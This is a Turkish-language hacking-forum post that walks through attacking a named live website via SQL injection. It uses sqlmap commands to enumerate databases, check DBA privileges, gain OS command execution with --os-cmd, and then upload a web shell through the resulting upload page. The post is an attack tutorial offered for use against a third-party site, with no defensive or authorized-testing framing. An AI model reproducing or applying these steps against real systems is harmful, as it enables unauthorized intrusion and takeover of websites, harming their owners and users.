Merhaba Değerli TurkHackTeam Ailesi.
Bu Konumda Sizlere SQLi Açığı İle OTO Shell Basmayı Göstereceğim.
Açık: SQLi
Kullanılacak Araçlar: SQLMAP
Ilk Olarak Hedef Sitemizi Belirleyelim
Benim Hedef Sitem Bu --> https://www.vanityfail.sk/2018/10/
![](https://i.hizliresim.com/sji39zv.png)
Resimdede Görüldüğü Üzere Sitede Açık Var.
SQLMAP Aracı İle İşlemler Yapalım.
Kod: sqlmap -u "hedefsite.com" --dbs
Görüldüğü Üzere DB'yi Çektik.
Şimdi Kullancağımız Kod Şu
Kod: sqlmap -u "hedefsite.com" --current-user --is-dba
İşlem Tamamlandığında
current user is DBA: 'True'
Diye Bir Çıktı Alacaksınız
Şimdi Son İşlemlere Geliyoruz
Kod: sqlmap -u "hedefsite.com" --os-cmd -v 1
![](https://i.hizliresim.com/if5k66r.png)
Benzeri Bir Çıktı Verecektir Buraya Sitedeki Hatayı Yazıyoruz Yani Bunu
Kod = /var/www/vanityfail.sk
Enter For NONE Diye Birşey Çıkarsa Hiç Birşey Yazmadan Enter Tuşuna Basın
Şimdi Çıkan Soruya "Y" Diyip Geçelim
Bize Bir Link Verdi Bu Linki Tarayıcımızla Açalım
Önümüze Upload Sekmesi Çıkıcaktır Buraya SHellinizi Girin Ve URL Kısmına Shellin Adını Yazınız
Ve İşlem Tamam
İyi Forumlar Dilerim Değerli TurkHackTeam Ailesi
Video Anlatım :